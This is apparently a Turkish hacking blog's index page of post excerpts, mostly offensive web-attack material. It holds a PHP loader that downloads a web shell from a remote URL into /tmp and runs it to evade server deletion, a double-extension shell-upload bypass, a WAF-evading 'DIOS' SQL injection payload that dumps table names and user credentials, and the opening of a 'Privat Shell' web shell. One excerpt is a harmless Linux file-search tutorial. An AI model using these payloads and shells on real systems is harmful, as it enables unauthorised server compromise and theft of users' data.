İçeriğe geç

Anasayfa Yazılar

servera yüklenen shell otomatik siliniyorsa

Kod: ‘; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?> yukarıda http://wwww.shellyolu.com/shell.txt olarak belirtilen yere kendi shell kodlarınızı txt olarak yüklediğiniz url yi girin ve php dosyasını servera upload edin. bu sayede tmp dizinine txt olarak belirtmiş olduğunuz…

Shell Upload Bypass

Shell upload bypass Kod: http://site.com/shell.txt editleyip kendi shell yolunuzu txt olarak ekleyin düzenlenen php dosyasını servera upload edin. Aynı dosyanın bulunduğu url de shell.png.phtml.pHP olarak shelliniz yüklenmiş olacaktır.

Linux Dosyalar içinde detaylı ( kelime, dosya ) arama

Linux işletim sisteminde yerini unuttuğumuz dosyayı bulmak için find ve locate komutunu kullanabiliriz.    Find komutunun kullanılması  Sadece belirtilen dizin yolu ve alt dizinler içirisinde arama yapar. # find /dizin_yolu/  -name “dosya_adi” Yukarıda verdiğimiz arama kalıbına göre kullanımını çeşitlendirebiliriz. 1. Sadece aradığımız dosyayı bulmak istiyorsak;   #find /etc/ -name “my.cnf” 2.…

Sunucu otomatik shelli siliyorsa

Burada Url yazan yere çalıştırmak istediğin shellin linkini gir. Bu shell tmp dizinine atılır ve oradan çağırılarak çalıştırılır. <?php //*thanx for idx $URL = ‘http://shelladresi.com’; $TMP = ‘/tmp/sess_’.md5($_SERVER[‘HTTP_HOST’]).’.php’; # dont change this !! function M() { $FGT = @file_get_contents($GLOBALS[‘URL’]); if(!$FGT) { echo `curl -k $(echo {$GLOBALS[‘URL’]} | base64 -d) >…

DİOS WAF Sql İnjection Bypass

TABLO ADI VE KOLON ADI BİLGİLERİNİ ÇIKARIR (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(/*!50000iNfoRMaTioN_ScHeMa.coLumNs*/)wHeRe(TaBLe_ScHeMa!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,TaBLe_NaMe,0x203a3a20,CoLumN_NaMe))))x) M KOLONDAKİ BİLGİLERİ ÇEKER (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(usercontrol)wHeRe(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,kulladi,0x203a3a20,kullsif,0x203a3a20,email))))x)

Privat Shell

  <?php error_reporting(0); set_time_limit(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo ‘<!DOCTYPE HTML> <html> <head> <link href=”” rel=”stylesheet” type=”text/css”> <title>thePriVat SHELL</title> <style> body{ font-family: “Monospace”, cursive; background-color: black; color:red; } #content tr:hover{ background-color: blue; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: cyan; } table{ border: 1px…